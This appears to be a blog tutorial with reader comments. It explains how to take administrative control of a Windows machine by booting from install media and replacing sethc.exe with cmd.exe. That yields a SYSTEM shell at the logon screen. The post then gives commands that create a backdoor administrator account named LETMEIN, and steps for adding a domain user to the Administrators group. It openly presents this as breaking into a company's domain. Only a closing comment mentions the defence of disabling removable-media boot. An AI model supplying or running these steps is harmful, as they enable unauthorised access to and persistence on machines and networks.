Acquiring Administrative Access to Windows
I will show you one of Windows weaknesses to break into your system. I’ll show you how to get access to the local computer and break into the company’s domain by giving yourself elevating admin rights to the machine you are logged into allowing you to do whatever you want as admin.
Step 1: Insert a Windows 7 or Windows 8 or Windows 10 DVD and restart your machine. The machine should boot into the DVD:
Step 2: You will get “Press any key to boot from CD or DVD…” hit a key to start the DVD”
Step 3: You will get this to this point:
Step 4: Do a Shift + F10 to get the command prompt
Step 5: Locate the drive where the Windows folders is located. Normally it’s the D drive. So do the following command – ‘d:‘ to change to the ‘d‘ drive:
Step 6: Type in the following “cd windows\system32”
Step 7: Type in “copy sethc.exe ..”
Step 8: Run a “copy cmd.exe sethc.exe”
Step 9: Run an “exit” command and reboot the machine:
Step 10: Once you are at the logon screen click on the “Shift” 5x
Step 11: Type in “whoami” you will see you are logged as NT AUTHORITY\SYSTEM – from here you can do what ever you want. Here are some commands that you can run:
- net user
- net user LETMEIN P@55w0rd /add
- net localgroup administrators LETMEIN /add
Step 12: If you want to add the domain user account within the Administrator group – type in “compmgmt.msc”
Step 13: Click on “Local Users and Groups”
Step 14: Double-click on “Administrators”
thanks for the lesson.
nice. so to prevent this one should disable user’s ability to boot from CD/DVD/USB.
correct. you can disable the CD/DVD/USB access. some companies do this because of sensitive data being held on there servers.